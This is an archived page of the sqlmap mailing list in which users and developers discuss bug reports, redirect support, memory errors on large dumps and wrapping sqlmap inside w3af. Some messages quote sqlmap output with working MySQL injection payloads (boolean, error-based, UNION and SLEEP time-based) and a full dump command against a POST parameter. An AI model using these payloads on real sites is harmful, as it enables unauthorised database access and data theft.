sqlmap-users Mailing List for sqlmap (Page 108)
Brought to you by:
inquisb
Menu
▾
▴
sqlmap-users — sqlmap users mailing list
You can subscribe to this list here.
| 2008 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
(4) |
Oct
(11) |
Nov
(24) |
Dec
(13) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2009 |
Jan
(23) |
Feb
(17) |
Mar
(13) |
Apr
(48) |
May
(22) |
Jun
(18) |
Jul
(22) |
Aug
(13) |
Sep
(23) |
Oct
(6) |
Nov
(11) |
Dec
(25) |
| 2010 |
Jan
(21) |
Feb
(33) |
Mar
(61) |
Apr
(47) |
May
(48) |
Jun
(30) |
Jul
(24) |
Aug
(37) |
Sep
(52) |
Oct
(59) |
Nov
(32) |
Dec
(57) |
| 2011 |
Jan
(166) |
Feb
(93) |
Mar
(65) |
Apr
(117) |
May
(87) |
Jun
(124) |
Jul
(102) |
Aug
(78) |
Sep
(65) |
Oct
(22) |
Nov
(71) |
Dec
(79) |
| 2012 |
Jan
(93) |
Feb
(55) |
Mar
(45) |
Apr
(49) |
May
(56) |
Jun
(93) |
Jul
(95) |
Aug
(42) |
Sep
(26) |
Oct
(36) |
Nov
(32) |
Dec
(46) |
| 2013 |
Jan
(36) |
Feb
(78) |
Mar
(38) |
Apr
(57) |
May
(35) |
Jun
(39) |
Jul
(23) |
Aug
(33) |
Sep
(28) |
Oct
(38) |
Nov
(22) |
Dec
(16) |
| 2014 |
Jan
(33) |
Feb
(23) |
Mar
(41) |
Apr
(29) |
May
(12) |
Jun
(20) |
Jul
(21) |
Aug
(23) |
Sep
(18) |
Oct
(34) |
Nov
(12) |
Dec
(39) |
| 2015 |
Jan
(2) |
Feb
(51) |
Mar
(10) |
Apr
(28) |
May
(9) |
Jun
(22) |
Jul
(32) |
Aug
(35) |
Sep
(29) |
Oct
(50) |
Nov
(8) |
Dec
(2) |
| 2016 |
Jan
(8) |
Feb
(2) |
Mar
(3) |
Apr
(14) |
May
|
Jun
|
Jul
|
Aug
(12) |
Sep
|
Oct
|
Nov
(1) |
Dec
(19) |
| 2017 |
Jan
|
Feb
(18) |
Mar
|
Apr
(1) |
May
|
Jun
|
Jul
|
Aug
(4) |
Sep
|
Oct
|
Nov
(2) |
Dec
|
| 2018 |
Jan
|
Feb
|
Mar
(1) |
Apr
(1) |
May
(3) |
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
| 2019 |
Jan
|
Feb
|
Mar
|
Apr
(3) |
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
|
From: Valentin K. <zac...@gm...> - 2011-01-29 19:40:54
|
---------- Forwarded message ---------- From: Valentin Kurkov <zac...@gm...> Date: 2011/1/29 Subject: Re: [sqlmap-users] sqlmap and follow redirections sql-inj To: "Bernardo Damele A. G." <ber...@gm...> update sqlmap from svn upto revision 3127,but now sqlmap don`t detect a sql-inj,even only with -u "http://url.com/test.php?id=1" .And,*Of course, no following redirection((* 2011/1/28 Bernardo Damele A. G. <ber...@gm...> Svn update and try with latest version. Http redirects should be well > supported now. > > Bernardo Damele A. G. > > This message was sent from a smartphone > > On 28 Jan 2011, at 17:59, Valentin Kurkov <zac...@gm...> wrote: > > > i have an 0.8 version,but don`t find no info about following redirection > on the page for union based sql(else -just blind sql).Maybe in future > releases this functions will be add?) > > > ------------------------------------------------------------------------------ > > Special Offer-- Download ArcSight Logger for FREE (a $49 USD value)! > > Finally, a world-class log management solution at an even better > price-free! > > Download using promo code Free_Logger_4_Dev2Dev. Offer expires > > February 28th, so secure your free ArcSight Logger TODAY! > > http://p.sf.net/sfu/arcsight-sfd2d > > _______________________________________________ > > sqlmap-users mailing list > > sql...@li... > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > |
|
From: Miroslav S. <mir...@gm...> - 2011-01-28 23:06:54
|
Hi David. I've made a little testing and couldn't reproduce this one. 100,000 rows with 100 columns (integer numbers from 0-99) and still no crashing (30MB long session file). Also, I've tried to make a really large array, but still nothing. OS went unresponsive, but couldn't get "MemoryError". Could you try to run it on some other system? Also, is there anything else interesting about this "large" data retrieval? KR On Thu, Jan 27, 2011 at 8:40 PM, David Guimaraes <sk...@gm...> wrote: > # ./sqlmap.py --method post --cookie "PHPSESSID=7i2j7ou46iu4c62xxx4kemiql6" > --data "vulnparam=6" -u "http://www.vulnsite.com/intranet/vulnphp.php" -v 3 > -D nomes -T class --dump > > sqlmap/0.9-dev - automatic SQL injection and database takeover tool > http://sqlmap.sourceforge.net > > [*] starting at: 16:58:05 > > [16:58:05] [DEBUG] cleaning up configuration parameters > [16:58:05] [DEBUG] setting the HTTP timeout > [16:58:05] [DEBUG] setting the HTTP Cookie header > [16:58:05] [DEBUG] setting the HTTP method to POST > [16:58:05] [DEBUG] creating HTTP requests opener object > [16:58:05] [INFO] using > '/home/kkk/sqlmap-dev/output/www.vulnsite.com/session' as session file > [16:58:05] [INFO] resuming injection data from session file > [16:58:05] [INFO] resuming back-end DBMS 'mysql 5.0' from session file > [16:58:05] [INFO] testing connection to the target url > you provided an HTTP Cookie header value. The target url provided its own > Cookie within the HTTP Set-Cookie header. Do you want to continue using the > HTTP Cookie values that you provided? [Y/n] > sqlmap identified the following injection points with a total of 0 HTTP(s) > requests: > --- > Place: POST > Parameter: vulnparam > Type: boolean-based blind > Title: AND boolean-based blind - WHERE or HAVING clause > Payload: vulnparam=6 AND 5647=5647 > > Type: error-based > Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause > Payload: vulnparam=6 AND (SELECT 714 FROM(SELECT > COUNT(*),CONCAT(CHAR(58,111,106,112,58),(SELECT (CASE WHEN (714=714) THEN 1 > ELSE 0 END)),CHAR(58,99,99,109,58),FLOOR(RAND(0)*2))x FROM > information_schema.tables GROUP BY x)a) > > Type: UNION query > Title: MySQL UNION query (NULL) - 4 to 7 columns > Payload: vulnparam=6 UNION ALL SELECT NULL, NULL, > CONCAT(CHAR(58,111,106,112,58),IFNULL(CAST(CHAR(101,76,89,111) AS CHAR), > CHAR(32)),CHAR(58,99,99,109,58)), NULL, NULL# > > Type: AND/OR time-based blind > Title: MySQL > 5.0.11 AND time-based blind > Payload: vulnparam=6 AND SLEEP(5) > --- > > [16:58:06] [INFO] the back-end DBMS is MySQL > > web application technology: PHP 5.3.2 > back-end DBMS: MySQL 5.0 > [16:58:06] [INFO] fetching columns for table 'class' on database 'nomes' > [16:58:06] [INFO] read from file > '/home/kkk/sqlmap-dev/output/www.vulnsite.com/session': vulncolumns > [16:58:06] [INFO] fetching entries for table 'class' on database 'nomes' > [16:58:06] [PAYLOAD] 6 UNION ALL SELECT NULL, NULL, > CONCAT(CHAR(58,101,110,122,58),XXX,CHAR(58,111,115,122,58)), NULL, NULL FROM > nomes.class# > [17:00:09] [DEBUG] performed 1 queries in 122 seconds > > [17:00:13] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run > with the latest development version from the Subversion repository. If the > exception persists, please send by e-mail to > sql...@li... the command line, the following text and > any information needed to reproduce the bug. The developers will try to > reproduce the bug, fix it accordingly and get back to you. > sqlmap version: 0.9-dev > Python version: 2.6.5 > Operating system: posix > Traceback (most recent call last): > File "./sqlmap.py", line 83, in main > start() > File "/home/kkk/sqlmap-dev/lib/controller/controller.py", line 414, in > start > action() > File "/home/kkk/sqlmap-dev/lib/controller/action.py", line 103, in action > conf.dumper.dbTableValues(conf.dbmsHandler.dumpTable()) > File "/home/kkk/sqlmap-dev/plugins/generic/enumeration.py", line 1189, in > dumpTable > entries = inject.getValue(query, blind=False, dump=True) > File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 427, in getValue > value = __goInband(query, expected, sort, resumeValue, unpack, dump) > File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 384, in __goInband > data = parseUnionPage(output, expression, partial, None, sort) > File "/home/kkk/sqlmap-dev/lib/core/common.py", line 785, in > parseUnionPage > dataToSessionFile("[%s][%s][%s][%s][%s]\n" % (conf.url, > kb.injection.place, conf.parameters[kb.injection.place], expression, > logOutput)) > MemoryError > > [*] shutting down at: 17:00:13 > > There are about 50,350 entries in the table and 48 columns.I tested the > query manually, and returned a page with 600k of information.I think that > sqlmap did not support the amount of data...? > > David > > ------------------------------------------------------------------------------ > Special Offer-- Download ArcSight Logger for FREE (a $49 USD value)! > Finally, a world-class log management solution at an even better price-free! > Download using promo code Free_Logger_4_Dev2Dev. Offer expires > February 28th, so secure your free ArcSight Logger TODAY! > http://p.sf.net/sfu/arcsight-sfd2d > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: Miroslav S. <mir...@gm...> - 2011-01-28 21:55:49
|
you can also make a dirty hack on your side. hint: >>> import sys >>> import urllib2 >>> sys.modules['urllib2'] <module 'urllib2' from '...'> >>> import os >>> sys.modules['urllib2'] = os >>> import urllib2 >>> dir(urllib2) ['F_OK', 'O_APPEND', 'O_BINARY', 'O_CREAT', 'O_EXCL', 'O_NOINHERIT', 'O_RANDOM', 'O_RDONLY', 'O_RDWR', 'O_SEQUENTIAL', 'O_SHORT_LIVED', 'O_TEMPORARY', 'O_TEXT', 'O_TRUNC', 'O_WRONLY', 'P_DETACH', 'P_NOWAIT', 'P_NOWAITO', 'P_OVERLAY', 'P_WAI ... kr On Fri, Jan 28, 2011 at 10:51 PM, Miroslav Stampar <mir...@gm...> wrote: > hi Andreas. > > On Fri, Jan 28, 2011 at 6:55 PM, Andres Riancho > <and...@gm...> wrote: >> Miroslav, >> >> On Thu, Jan 27, 2011 at 7:12 PM, Miroslav Stampar >> <mir...@gm...> wrote: >>> Hi. >>> >>> I would suggest you to research "lib\core\testing.py" (liveTest() >>> together with auxiliary methods). It was not updated for quite long >>> time, but it should be useful for starters. It's meant for our >>> internal testing (smoke testing for dummy checking via module loading >>> and live testing against our VMs). >> >> Cool, I'll take a look at that. Something else I'm thinking about >> is that sqlmap uses urllib2 to send HTTP requests, while w3af uses a >> urllib2 wrapper, and when a w3af user sets proxy settings and stuff he >> expects that to be applied "system-wide", affecting sqlmap. Is there > > switch --ignore-proxy can be used to ignore "system-wide" proxy > setting, while the default behavior is to use "system-wide" proxy, so > sqlmap is quite smart in this field. > >> any easy way to modify sqlmap to use our >> HTTP_request_sender_object.GET() ? > well, no easy way out of box. we haven't "meant" this kind of things :) > > as it would require us to make a "dirty hack" on our side, i would > suggest you guys to play around a bit and if you have some suggestions > from your side (avoiding word "dirty" on our side) feel free to tell. > > kr >> >> Regards, >> >>> KR >>> >>> On Thu, Jan 27, 2011 at 11:04 PM, Andres Riancho >>> <and...@gm...> wrote: >>>> Guys, >>>> >>>> What's the best way to create a sqlmap wrapper? >>>> >>>> In the w3af project we have a very old version of sqlmap >>>> integrated as an attack plugin [0]. Right now we're doing something >>>> like: "import sqlmap ; sqlmap.do_something()". Since the sqlmap >>>> version we include is very old, I would like to update it to the >>>> latest trunk version. My objective is to build something that's >>>> extensible and will allow me to update w3af's sqlmap frequently >>>> without any (if possible) effort. In order to do that, I need to write >>>> a decent wrapper that will not depend on the changes in sqlmap's >>>> implementation. >>>> >>>> Ideas? >>>> >>>> Regards, >>>> >>>> [0] (which is called sqlmap, we don't try to fool nobody or steal your efforts) >>>> -- >>>> Andrés Riancho >>>> Director of Web Security at Rapid7 LLC >>>> Founder at Bonsai Information Security >>>> Project Leader at w3af >>>> >>>> ------------------------------------------------------------------------------ >>>> Special Offer-- Download ArcSight Logger for FREE (a $49 USD value)! >>>> Finally, a world-class log management solution at an even better price-free! >>>> Download using promo code Free_Logger_4_Dev2Dev. Offer expires >>>> February 28th, so secure your free ArcSight Logger TODAY! >>>> http://p.sf.net/sfu/arcsight-sfd2d >>>> _______________________________________________ >>>> sqlmap-users mailing list >>>> sql...@li... >>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>> >>> >>> >>> >>> -- >>> Miroslav Stampar >>> >>> E-mail / Jabber: miroslav.stampar (at) gmail.com >>> Mobile: +385921010204 (HR 0921010204) >>> PGP Key ID: 0xB5397B1B >>> Location: Zagreb, Croatia >>> >> >> >> >> -- >> Andrés Riancho >> Director of Web Security at Rapid7 LLC >> Founder at Bonsai Information Security >> Project Leader at w3af >> > > > > -- > Miroslav Stampar > > E-mail / Jabber: miroslav.stampar (at) gmail.com > Mobile: +385921010204 (HR 0921010204) > PGP Key ID: 0xB5397B1B > Location: Zagreb, Croatia > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: Miroslav S. <mir...@gm...> - 2011-01-28 21:51:32
|
hi Andreas. On Fri, Jan 28, 2011 at 6:55 PM, Andres Riancho <and...@gm...> wrote: > Miroslav, > > On Thu, Jan 27, 2011 at 7:12 PM, Miroslav Stampar > <mir...@gm...> wrote: >> Hi. >> >> I would suggest you to research "lib\core\testing.py" (liveTest() >> together with auxiliary methods). It was not updated for quite long >> time, but it should be useful for starters. It's meant for our >> internal testing (smoke testing for dummy checking via module loading >> and live testing against our VMs). > > Cool, I'll take a look at that. Something else I'm thinking about > is that sqlmap uses urllib2 to send HTTP requests, while w3af uses a > urllib2 wrapper, and when a w3af user sets proxy settings and stuff he > expects that to be applied "system-wide", affecting sqlmap. Is there switch --ignore-proxy can be used to ignore "system-wide" proxy setting, while the default behavior is to use "system-wide" proxy, so sqlmap is quite smart in this field. > any easy way to modify sqlmap to use our > HTTP_request_sender_object.GET() ? well, no easy way out of box. we haven't "meant" this kind of things :) as it would require us to make a "dirty hack" on our side, i would suggest you guys to play around a bit and if you have some suggestions from your side (avoiding word "dirty" on our side) feel free to tell. kr > > Regards, > >> KR >> >> On Thu, Jan 27, 2011 at 11:04 PM, Andres Riancho >> <and...@gm...> wrote: >>> Guys, >>> >>> What's the best way to create a sqlmap wrapper? >>> >>> In the w3af project we have a very old version of sqlmap >>> integrated as an attack plugin [0]. Right now we're doing something >>> like: "import sqlmap ; sqlmap.do_something()". Since the sqlmap >>> version we include is very old, I would like to update it to the >>> latest trunk version. My objective is to build something that's >>> extensible and will allow me to update w3af's sqlmap frequently >>> without any (if possible) effort. In order to do that, I need to write >>> a decent wrapper that will not depend on the changes in sqlmap's >>> implementation. >>> >>> Ideas? >>> >>> Regards, >>> >>> [0] (which is called sqlmap, we don't try to fool nobody or steal your efforts) >>> -- >>> Andrés Riancho >>> Director of Web Security at Rapid7 LLC >>> Founder at Bonsai Information Security >>> Project Leader at w3af >>> >>> ------------------------------------------------------------------------------ >>> Special Offer-- Download ArcSight Logger for FREE (a $49 USD value)! >>> Finally, a world-class log management solution at an even better price-free! >>> Download using promo code Free_Logger_4_Dev2Dev. Offer expires >>> February 28th, so secure your free ArcSight Logger TODAY! >>> http://p.sf.net/sfu/arcsight-sfd2d >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >> >> >> >> -- >> Miroslav Stampar >> >> E-mail / Jabber: miroslav.stampar (at) gmail.com >> Mobile: +385921010204 (HR 0921010204) >> PGP Key ID: 0xB5397B1B >> Location: Zagreb, Croatia >> > > > > -- > Andrés Riancho > Director of Web Security at Rapid7 LLC > Founder at Bonsai Information Security > Project Leader at w3af > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: Bernardo D. A. G. <ber...@gm...> - 2011-01-28 18:22:40
|
Svn update and try with latest version. Http redirects should be well supported now. Bernardo Damele A. G. This message was sent from a smartphone On 28 Jan 2011, at 17:59, Valentin Kurkov <zac...@gm...> wrote: > i have an 0.8 version,but don`t find no info about following redirection on the page for union based sql(else -just blind sql).Maybe in future releases this functions will be add?) > ------------------------------------------------------------------------------ > Special Offer-- Download ArcSight Logger for FREE (a $49 USD value)! > Finally, a world-class log management solution at an even better price-free! > Download using promo code Free_Logger_4_Dev2Dev. Offer expires > February 28th, so secure your free ArcSight Logger TODAY! > http://p.sf.net/sfu/arcsight-sfd2d > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users |
|
From: Valentin K. <zac...@gm...> - 2011-01-28 17:59:25
|
i have an 0.8 version,but don`t find no info about following redirection on the page for union based sql(else -just blind sql).Maybe in future releases this functions will be add?) |
|
From: Andres R. <and...@gm...> - 2011-01-28 17:56:02
|
Miroslav,
On Thu, Jan 27, 2011 at 7:12 PM, Miroslav Stampar
<mir...@gm...> wrote:
> Hi.
>
> I would suggest you to research "lib\core\testing.py" (liveTest()
> together with auxiliary methods). It was not updated for quite long
> time, but it should be useful for starters. It's meant for our
> internal testing (smoke testing for dummy checking via module loading
> and live testing against our VMs).
Cool, I'll take a look at that. Something else I'm thinking about
is that sqlmap uses urllib2 to send HTTP requests, while w3af uses a
urllib2 wrapper, and when a w3af user sets proxy settings and stuff he
expects that to be applied "system-wide", affecting sqlmap. Is there
any easy way to modify sqlmap to use our
HTTP_request_sender_object.GET() ?
Regards,
> KR
>
> On Thu, Jan 27, 2011 at 11:04 PM, Andres Riancho
> <and...@gm...> wrote:
>> Guys,
>>
>> What's the best way to create a sqlmap wrapper?
>>
>> In the w3af project we have a very old version of sqlmap
>> integrated as an attack plugin [0]. Right now we're doing something
>> like: "import sqlmap ; sqlmap.do_something()". Since the sqlmap
>> version we include is very old, I would like to update it to the
>> latest trunk version. My objective is to build something that's
>> extensible and will allow me to update w3af's sqlmap frequently
>> without any (if possible) effort. In order to do that, I need to write
>> a decent wrapper that will not depend on the changes in sqlmap's
>> implementation.
>>
>> Ideas?
>>
>> Regards,
>>
>> [0] (which is called sqlmap, we don't try to fool nobody or steal your efforts)
>> --
>> Andrés Riancho
>> Director of Web Security at Rapid7 LLC
>> Founder at Bonsai Information Security
>> Project Leader at w3af
>>
>> ------------------------------------------------------------------------------
>> Special Offer-- Download ArcSight Logger for FREE (a $49 USD value)!
>> Finally, a world-class log management solution at an even better price-free!
>> Download using promo code Free_Logger_4_Dev2Dev. Offer expires
>> February 28th, so secure your free ArcSight Logger TODAY!
>> http://p.sf.net/sfu/arcsight-sfd2d
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>
>
>
> --
> Miroslav Stampar
>
> E-mail / Jabber: miroslav.stampar (at) gmail.com
> Mobile: +385921010204 (HR 0921010204)
> PGP Key ID: 0xB5397B1B
> Location: Zagreb, Croatia
>
--
Andrés Riancho
Director of Web Security at Rapid7 LLC
Founder at Bonsai Information Security
Project Leader at w3af
|
|
From: Miroslav S. <mir...@gm...> - 2011-01-28 16:06:57
|
good suggestion. for this one: r3125 kr On Fri, Jan 28, 2011 at 4:57 PM, <bu...@gm...> wrote: > On 01/28/2011 02:31 PM, Miroslav Stampar wrote: >> Bug has been found and fixed :) > > Would be nice if you could include the revision number for such > announcements. This would render them more useful if one stumbles on > such an email via an archive search. > thanks! > > ------------------------------------------------------------------------------ > Special Offer-- Download ArcSight Logger for FREE (a $49 USD value)! > Finally, a world-class log management solution at an even better price-free! > Download using promo code Free_Logger_4_Dev2Dev. Offer expires > February 28th, so secure your free ArcSight Logger TODAY! > http://p.sf.net/sfu/arcsight-sfd2d > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: <bu...@gm...> - 2011-01-28 15:58:27
|
On 01/28/2011 02:31 PM, Miroslav Stampar wrote: > Bug has been found and fixed :) Would be nice if you could include the revision number for such announcements. This would render them more useful if one stumbles on such an email via an archive search. thanks! |
|
From: Miroslav S. <mir...@gm...> - 2011-01-28 15:15:22
|
are you also getting this with --flush-session? On Fri, Jan 28, 2011 at 3:43 PM, yonny mutai <yo...@go...> wrote: > 17:41:07] [INFO] read from file > '/pentest/database/sqlmap/output/192.168.200.203/session': > [17:41:08] [WARNING] time-based comparison needs larger statistical model. > Making a few dummy requests, please wait.. > > [17:41:30] [INFO] read from file > '/pentest/database/sqlmap/output/192.168.200.203/session': > [17:41:30] [INFO] retrieved: > [17:41:37] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run > with the latest development version from the Subversion repository. If the > exception persists, please send by e-mail to > sql...@li... the command line, the following text and > any information needed to reproduce the bug. The developers will try to > reproduce the bug, fix it accordingly and get back to you. > sqlmap version: 0.9-dev (r3125) > Python version: 2.6.5 > Operating system: posix > Traceback (most recent call last): > File "./sqlmap.py", line 83, in main > start() > File "/pentest/database/sqlmap/lib/controller/controller.py", line 414, in > start > action() > File "/pentest/database/sqlmap/lib/controller/action.py", line 106, in > action > conf.dbmsHandler.dumpAll() > File "/pentest/database/sqlmap/plugins/generic/enumeration.py", line 1405, > in dumpAll > kb.data.cachedTables = self.getTables() > File "/pentest/database/sqlmap/plugins/generic/enumeration.py", line 821, > in getTables > for db, table in value: > ValueError: need more than 1 value to unpack > [*] shutting down at: 17:41:37 > > ------------------------------------------------------------------------------ > Special Offer-- Download ArcSight Logger for FREE (a $49 USD value)! > Finally, a world-class log management solution at an even better price-free! > Download using promo code Free_Logger_4_Dev2Dev. Offer expires > February 28th, so secure your free ArcSight Logger TODAY! > http://p.sf.net/sfu/arcsight-sfd2d > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: Miroslav S. <mir...@gm...> - 2011-01-28 15:12:55
|
yes, Bernardo warned me about this yesterday night :) we'll try to find something kr On Fri, Jan 28, 2011 at 4:02 PM, David Guimaraes <sk...@gm...> wrote: > --start and --stop are not working > > Sqlmap just ignore these parameter. i think when used with union injection > technique, these parameters are ignored(??). tried with --start 1 and --stop > 20. > > > On Thu, Jan 27, 2011 at 6:04 PM, Miroslav Stampar > <mir...@gm...> wrote: >> >> in the mean time you can try to use these: >> >> --start=LIMITSTART First query output entry to retrieve >> --stop=LIMITSTOP Last query output entry to retrieve >> >> kr >> >> On Thu, Jan 27, 2011 at 8:55 PM, Miroslav Stampar >> <mir...@gm...> wrote: >> > http://mail.python.org/pipermail/mailman-users/2005-October/047436.html >> > >> > "A MemoryError exception is a built-in Python exception "Raised when an >> > operation runs out of memory but the situation may still be rescued >> > (by deleting some objects)." >> > >> > How many members does this list have? According to the FAQ, the largest >> > list reported to date has 147,000 members and presumably works. >> > Possibly something in the cPanel implementation or your particular >> > installation limits this to a greater degree." >> > >> > now, this messes our concept a bit but we'll try to adapt. >> > >> > kr >> > >> > On Thu, Jan 27, 2011 at 8:45 PM, Miroslav Stampar >> > <mir...@gm...> wrote: >> >> LOL (50,350 entries in the table and 48 columns) >> >> >> >> we'll try to make some tests regarding this and report accordingly. >> >> haven't planed this kind of "huge" data retrievals :) >> >> >> >> kr >> >> >> >> On Thu, Jan 27, 2011 at 8:40 PM, David Guimaraes <sk...@gm...> >> >> wrote: >> >>> # ./sqlmap.py --method post --cookie >> >>> "PHPSESSID=7i2j7ou46iu4c62xxx4kemiql6" >> >>> --data "vulnparam=6" -u "http://www.vulnsite.com/intranet/vulnphp.php" >> >>> -v 3 >> >>> -D nomes -T class --dump >> >>> >> >>> sqlmap/0.9-dev - automatic SQL injection and database takeover >> >>> tool >> >>> http://sqlmap.sourceforge.net >> >>> >> >>> [*] starting at: 16:58:05 >> >>> >> >>> [16:58:05] [DEBUG] cleaning up configuration parameters >> >>> [16:58:05] [DEBUG] setting the HTTP timeout >> >>> [16:58:05] [DEBUG] setting the HTTP Cookie header >> >>> [16:58:05] [DEBUG] setting the HTTP method to POST >> >>> [16:58:05] [DEBUG] creating HTTP requests opener object >> >>> [16:58:05] [INFO] using >> >>> '/home/kkk/sqlmap-dev/output/www.vulnsite.com/session' as session file >> >>> [16:58:05] [INFO] resuming injection data from session file >> >>> [16:58:05] [INFO] resuming back-end DBMS 'mysql 5.0' from session file >> >>> [16:58:05] [INFO] testing connection to the target url >> >>> you provided an HTTP Cookie header value. The target url provided its >> >>> own >> >>> Cookie within the HTTP Set-Cookie header. Do you want to continue >> >>> using the >> >>> HTTP Cookie values that you provided? [Y/n] >> >>> sqlmap identified the following injection points with a total of 0 >> >>> HTTP(s) >> >>> requests: >> >>> --- >> >>> Place: POST >> >>> Parameter: vulnparam >> >>> Type: boolean-based blind >> >>> Title: AND boolean-based blind - WHERE or HAVING clause >> >>> Payload: vulnparam=6 AND 5647=5647 >> >>> >> >>> Type: error-based >> >>> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause >> >>> Payload: vulnparam=6 AND (SELECT 714 FROM(SELECT >> >>> COUNT(*),CONCAT(CHAR(58,111,106,112,58),(SELECT (CASE WHEN (714=714) >> >>> THEN 1 >> >>> ELSE 0 END)),CHAR(58,99,99,109,58),FLOOR(RAND(0)*2))x FROM >> >>> information_schema.tables GROUP BY x)a) >> >>> >> >>> Type: UNION query >> >>> Title: MySQL UNION query (NULL) - 4 to 7 columns >> >>> Payload: vulnparam=6 UNION ALL SELECT NULL, NULL, >> >>> CONCAT(CHAR(58,111,106,112,58),IFNULL(CAST(CHAR(101,76,89,111) AS >> >>> CHAR), >> >>> CHAR(32)),CHAR(58,99,99,109,58)), NULL, NULL# >> >>> >> >>> Type: AND/OR time-based blind >> >>> Title: MySQL > 5.0.11 AND time-based blind >> >>> Payload: vulnparam=6 AND SLEEP(5) >> >>> --- >> >>> >> >>> [16:58:06] [INFO] the back-end DBMS is MySQL >> >>> >> >>> web application technology: PHP 5.3.2 >> >>> back-end DBMS: MySQL 5.0 >> >>> [16:58:06] [INFO] fetching columns for table 'class' on database >> >>> 'nomes' >> >>> [16:58:06] [INFO] read from file >> >>> '/home/kkk/sqlmap-dev/output/www.vulnsite.com/session': vulncolumns >> >>> [16:58:06] [INFO] fetching entries for table 'class' on database >> >>> 'nomes' >> >>> [16:58:06] [PAYLOAD] 6 UNION ALL SELECT NULL, NULL, >> >>> CONCAT(CHAR(58,101,110,122,58),XXX,CHAR(58,111,115,122,58)), NULL, >> >>> NULL FROM >> >>> nomes.class# >> >>> [17:00:09] [DEBUG] performed 1 queries in 122 seconds >> >>> >> >>> [17:00:13] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry >> >>> your run >> >>> with the latest development version from the Subversion repository. If >> >>> the >> >>> exception persists, please send by e-mail to >> >>> sql...@li... the command line, the following >> >>> text and >> >>> any information needed to reproduce the bug. The developers will try >> >>> to >> >>> reproduce the bug, fix it accordingly and get back to you. >> >>> sqlmap version: 0.9-dev >> >>> Python version: 2.6.5 >> >>> Operating system: posix >> >>> Traceback (most recent call last): >> >>> File "./sqlmap.py", line 83, in main >> >>> start() >> >>> File "/home/kkk/sqlmap-dev/lib/controller/controller.py", line 414, >> >>> in >> >>> start >> >>> action() >> >>> File "/home/kkk/sqlmap-dev/lib/controller/action.py", line 103, in >> >>> action >> >>> conf.dumper.dbTableValues(conf.dbmsHandler.dumpTable()) >> >>> File "/home/kkk/sqlmap-dev/plugins/generic/enumeration.py", line >> >>> 1189, in >> >>> dumpTable >> >>> entries = inject.getValue(query, blind=False, dump=True) >> >>> File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 427, in >> >>> getValue >> >>> value = __goInband(query, expected, sort, resumeValue, unpack, >> >>> dump) >> >>> File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 384, in >> >>> __goInband >> >>> data = parseUnionPage(output, expression, partial, None, sort) >> >>> File "/home/kkk/sqlmap-dev/lib/core/common.py", line 785, in >> >>> parseUnionPage >> >>> dataToSessionFile("[%s][%s][%s][%s][%s]\n" % (conf.url, >> >>> kb.injection.place, conf.parameters[kb.injection.place], expression, >> >>> logOutput)) >> >>> MemoryError >> >>> >> >>> [*] shutting down at: 17:00:13 >> >>> >> >>> There are about 50,350 entries in the table and 48 columns.I tested >> >>> the >> >>> query manually, and returned a page with 600k of information.I think >> >>> that >> >>> sqlmap did not support the amount of data...? >> >>> >> >>> David >> >>> >> >>> >> >>> ------------------------------------------------------------------------------ >> >>> Special Offer-- Download ArcSight Logger for FREE (a $49 USD value)! >> >>> Finally, a world-class log management solution at an even better >> >>> price-free! >> >>> Download using promo code Free_Logger_4_Dev2Dev. Offer expires >> >>> February 28th, so secure your free ArcSight Logger TODAY! >> >>> http://p.sf.net/sfu/arcsight-sfd2d >> >>> _______________________________________________ >> >>> sqlmap-users mailing list >> >>> sql...@li... >> >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >>> >> >>> >> >> >> >> >> >> >> >> -- >> >> Miroslav Stampar >> >> >> >> E-mail / Jabber: miroslav.stampar (at) gmail.com >> >> Mobile: +385921010204 (HR 0921010204) >> >> PGP Key ID: 0xB5397B1B >> >> Location: Zagreb, Croatia >> >> >> > >> > >> > >> > -- >> > Miroslav Stampar >> > >> > E-mail / Jabber: miroslav.stampar (at) gmail.com >> > Mobile: +385921010204 (HR 0921010204) >> > PGP Key ID: 0xB5397B1B >> > Location: Zagreb, Croatia >> > >> >> >> >> -- >> Miroslav Stampar >> >> E-mail / Jabber: miroslav.stampar (at) gmail.com >> 